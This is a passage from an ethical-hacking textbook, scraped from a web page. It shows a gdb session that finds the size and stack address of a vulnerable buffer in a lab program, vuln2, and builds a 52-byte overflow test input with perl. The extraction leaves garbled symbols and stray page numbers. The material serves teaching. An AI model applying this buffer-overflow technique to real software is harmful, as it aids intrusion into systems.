In the real world, a little more research will be
required to find the location of the vulnerable buffer by looking at the disassembly and
by some trial and error.
BT book $ gdb -q vuln2
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483aa
(gdb) r
Starting program: /mnt/sda1/book/book/vuln2
Breakpoint 1, 0x080483aa in main ()
(gdb) disas main
Dump of assembler code for function main:
0x080483a4
: push %ebp
0x080483a5 : mov %esp,%ebp
0x080483a7 : sub $0x18,%esp
Now that we know the size of the vulnerable buffer and compiler added padding (0x18=
24), we can calculate the location of the sixth memory address by adding: 24 + 6�4 = 48 =
0x30. Since we will place 4 bytes in that last location, the total size of the attack buffer will
be 52 bytes. Next we will send a representative size (52 bytes) buffer into our vulnerable
program and find the location of the beginning of the vulnerable buffer with gdb by printing
the value of $esp.
(gdb) r `perl -e 'print "AAAA"x13'`Quit
Starting program: /mnt/sda1/book/book/vuln2 `perl -e 'print "AAAA"x13'`Quit
Gray Hat Hacking: The Ethical Hacker??™s Handbook
192
Breakpoint 1, 0x080483aa in main ()
(gdb) p $esp
$1 = (void *) 0xbffff560
(gdb)q
The program is running.
Pages:
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377